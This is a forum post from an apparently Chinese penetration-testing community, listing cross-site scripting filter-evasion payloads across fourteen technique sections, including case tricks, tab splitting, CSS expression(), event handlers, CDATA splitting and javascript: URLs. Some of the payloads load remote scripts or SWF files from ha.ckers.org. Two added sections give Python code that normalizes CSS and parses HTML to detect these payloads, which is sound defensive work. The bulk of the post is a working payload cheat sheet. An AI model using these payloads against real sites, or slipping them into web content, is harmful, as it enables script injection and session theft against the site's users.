中国网络渗透测试联盟

Title: Introduction to Cross Site Scripting (XSS) Attack Techniques

Author: admin    Time: 2012-12-31 09:59
1. Change the letter case

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use a different file extension instead of .js

    <script src="bad.jpg"></script>

4. Put JavaScript inside a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Insert extra characters inside the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use tabs or newlines to evade (the tab and newline characters inside the payloads below appear as spaces)

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> new line

7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)
   (the hex-encoded versions were decoded when the post was rendered, so each appears identical to its source below)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

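Added example for sections 7 and 8, not from the original post: a CSS engine removes comments, decodes backslash escapes (a backslash followed by one to six hex digits is a code point and may swallow one following whitespace character; a backslash before any other character stands for that character) and matches identifiers case-insensitively, so expre\ssi\on, expr/*anyword*/ession and the hex form expre\73 sion all reach the engine as "expression". The Python below normalizes a style value the same way before looking for expression( or javascript:. The function names, the two indicator strings and the sample values are assumptions; the expre\73 sion sample is constructed to show the hex form section 8 names. The comment stripper is string-aware because the last payload in section 7 puts *//* inside a quoted string precisely to break a naive comment-stripping regex.

```python
import re

# Indicator strings looked for after normalization (assumption: the two that
# this post's CSS payloads rely on).
CSS_INDICATORS = ("expression(", "javascript:")

# CSS escape: "\" + 1-6 hex digits (+ one optional whitespace), or "\" + any other character.
_CSS_ESCAPE = re.compile(r"\\(?:([0-9a-fA-F]{1,6})[ \t\n\r\f]?|(.))", re.S)


def strip_css_comments(text: str) -> str:
    """Drop /* ... */ comments, but copy string tokens verbatim so that a
    '*//*' inside quotes is not mistaken for a comment boundary."""
    out, i, n = [], 0, len(text)
    while i < n:
        c = text[i]
        if c in "\"'":
            j = i + 1
            while j < n and text[j] != c:
                j += 2 if text[j] == "\\" else 1   # skip escaped characters inside the string
            out.append(text[i:j + 1])
            i = j + 1
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j < 0 else j + 2                # unterminated comment runs to end of input
        else:
            out.append(c)
            i += 1
    return "".join(out)


def decode_css_escapes(text: str) -> str:
    """Replace CSS backslash escapes with the characters they stand for."""
    def repl(m):
        if m.group(1) is not None:
            cp = int(m.group(1), 16)
            if cp == 0 or 0xD800 <= cp <= 0xDFFF or cp > 0x10FFFF:
                return "\ufffd"                     # invalid code points become U+FFFD
            return chr(cp)
        return m.group(2)
    return _CSS_ESCAPE.sub(repl, text)


def normalize_css(text: str) -> str:
    """Comments out, escapes decoded, whitespace removed, lowercased."""
    text = decode_css_escapes(strip_css_comments(text))
    return re.sub(r"\s+", "", text).lower()


def css_is_dangerous(style_value: str) -> bool:
    """True when a style value, seen as the CSS engine sees it, carries an indicator."""
    normalized = normalize_css(style_value)
    return any(ind in normalized for ind in CSS_INDICATORS)


# Constructed samples: style values from sections 7 and 8, a hex-escaped form, and a benign value.
SAMPLES = {
    "backslash": r"width: expre\ssi\on(alert('XSS31'));",
    "comment":   r"xss:expr/*anyword*/ession(alert('sss'))",
    "string":    r'no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))',
    "import":    r"""@im\port'\ja\vasc\ript:alert("XSS32")';""",
    "hex":       r"width: expre\73 sion(alert('XSS'));",
    "benign":    'background-image: url("https://example.com/bg.png")',
}

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        print(f"{label:9} -> {normalize_css(value)!r}  dangerous={css_is_dangerous(value)}")
```

Running the file prints each sample after normalization next to the verdict; the point to take from it is that the check has to run on the normalized form, since every evasion in sections 7 and 8 leaves the raw attribute value free of the literal word "expression".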
9. Script in HTML tag event handlers

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code contained in an SWF

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split up the XSS code and reassemble it.

    <XML ID=I><X><C>
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
    </C></X>
    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2">
    <t:set attributeName="innerHTML" to="anyword&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
    </BODY></HTML>

13. Write a cookie via META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript: in src, href, url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

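Added defender-side example, not part of the original post, for sections 1, 6, 9 and 14: every payload in those sections defeats a filter that looks for literal strings such as <script> or javascript: in the raw markup. The Python below parses the markup with the standard library's html.parser, which lowercases tag and attribute names and decodes character references, then normalizes each URL-valued attribute the way a browser does (strip leading and trailing control characters and spaces, remove every tab, CR and LF) before checking its scheme against an allowlist, so the case and whitespace tricks no longer hide the scheme. The scheme allowlist, the set of URL-bearing attribute names, the function names and the sample inputs (payload shapes taken from this post plus one benign link) are assumptions made for the example.

```python
import re
from html.parser import HTMLParser

# Assumption: an allowlist of schemes, because denylists are what sections 1, 6 and 14 defeat.
SAFE_SCHEMES = {"http", "https", "mailto"}
# Attributes whose value is fetched or navigated as a URL (the names used in this post).
URL_ATTRS = {"src", "href", "dynsrc", "lowsrc", "background", "action", "data"}

# Browsers strip C0 controls and spaces from both ends of a URL string and remove every
# tab/CR/LF anywhere in it before looking at the scheme; mirror that here.
_EDGE_JUNK = "".join(chr(c) for c in range(0x21))
_INNER_JUNK = re.compile(r"[\t\n\r]")


def normalize_url(value: str) -> str:
    """Apply the browser's pre-parse cleanup so the filter sees what the browser sees."""
    return _INNER_JUNK.sub("", value.strip(_EDGE_JUNK))


def url_scheme(value: str):
    """Lowercase scheme of a URL, or None for a relative URL."""
    m = re.match(r"([a-zA-Z][a-zA-Z0-9+.\-]*):", normalize_url(value))
    return m.group(1).lower() if m else None


def is_safe_url(value: str) -> bool:
    scheme = url_scheme(value)
    return scheme is None or scheme in SAFE_SCHEMES


def naive_filter_catches(html: str) -> bool:
    """The literal-string check that this post's payloads are written to slip past."""
    return "<script>" in html or "javascript:" in html


class Finder(HTMLParser):
    """Collects (kind, detail) findings. html.parser lowercases tag and attribute
    names and decodes references such as &#x09;, so case and encoding tricks vanish."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style", "embed", "xml"):
            self.findings.append(("active-tag", tag))
        for name, value in attrs:
            if name.startswith("on"):                       # any event handler attribute
                self.findings.append(("event-handler", name))
            elif name in URL_ATTRS and value is not None and not is_safe_url(value):
                self.findings.append(("unsafe-url", url_scheme(value)))


def scan(html: str):
    """Return the list of findings for a markup fragment."""
    parser = Finder()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed inputs: payload shapes from this post plus one benign link.
SAMPLES = {
    "case":    "<sCript>alert('d')</scRipT>",
    "tab":     "<IMG SRC=\"jav\tascr\tipt:alert('XSS3')\">",
    "newline": "<img src=\"jav\nascript:alert('XSS')\">",
    "handler": "<body onload=\"alert('onload')\">",
    "benign":  "<a href=\"https://example.com/\">link</a>",
}

if __name__ == "__main__":
    for label, html in SAMPLES.items():
        print(f"{label:8} naive={naive_filter_catches(html)!s:5} parsed={scan(html)}")
```

Running the file shows the naive literal check returning False for every payload while the parser-based scan reports each one; the design point is to decide on the parsed, normalized value rather than on the raw text, and to allowlist schemes rather than denylist strings.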




Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2